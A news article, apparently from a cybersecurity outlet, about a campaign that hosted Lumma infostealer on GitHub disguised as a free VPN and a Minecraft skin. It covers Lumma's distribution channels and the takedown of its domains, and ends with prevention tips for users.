Hackers use GitHub to spread malware disguised as a free VPN

Attackers are weaponizing GitHub to deliver powerful infostealing malware under the guise of a free VPN.

By now, you'd think people might be suspicious of a random free VPN floating around on GitHub. But threat actors keep dropping the bait, expecting to steal data from naive users.

That’s exactly what one campaign, identified by cybersecurity firm Cyfirma, did. The malware was hosted openly on a GitHub account, disguised as “Free VPN for PC.” But rather than function as advertised, it installed Lumma infostealer onto the victims’ systems.

Cyfirma also found a similar sample uploaded under the name “Minecraft Skin,” suggesting that the attacker was targeting multiple user groups, from privacy-seeking adults to younger gamers.

The use of GitHub in this campaign highlights an ongoing issue of attackers turning to trusted, open platforms to deliver malware. By using GitHub’s reputation and its open, user-generated content model, malicious actors can host and distribute payloads without raising immediate red flags.

Lumma infostealer is one of the most popular infostealers in the wild. Victims have reported getting infected through multiple channels, including YouTube videos that pose as cracked software tutorials, luring users into downloading malware installers.

Others encounter it through fake CAPTCHA pop-ups, which trick users into running malicious scripts under the pretense of verifying they're human.

The malware is written in C language and has been available through a malware-as-a-service (MaaS) model on underground forums and a Telegram channel since 2022. It’s priced at $140-$160 per month.

The US Justice Department and Microsoft announced the takedown of over 2300 malicious domains this May, disrupting the central infrastructure of the LummaC2 infostealer.

How to prevent future Lumma infostealer infections

• Avoid clicking suspicious links: Most Lumma Stealer infections start with a phishing link. These can appear in emails, social media messages, or in ads. Always check whether the link you’re clicking comes from a reputable website.
• Don’t download files from unknown sources: Lumma Stealer is often hidden in files like pirated games, TV shows, or ebooks. If you’re downloading files from such sources, proceed with extreme caution.
• Use antivirus software: Antivirus software will ensure that you have real-time protection enabled, and, should you run into Lumma Stealer, it will protect you from accidentally installing it.
• Do not paste commands into the command line or run window: Lumma Stealer websites often prompt you to run something in your run window or command line to “confirm your identity.” This isn’t needed. Do not paste commands from unknown websites into the command line, as these attacks can be hard to detect even for the best antivirus software.
• Enable two-factor authentication (2FA): In case you become infected, 2FA will help you avoid losing access to important accounts, like your online banking, or email.

Check out Cybernews’ step-by-step guide on how to remove Lumma infostealer from your device.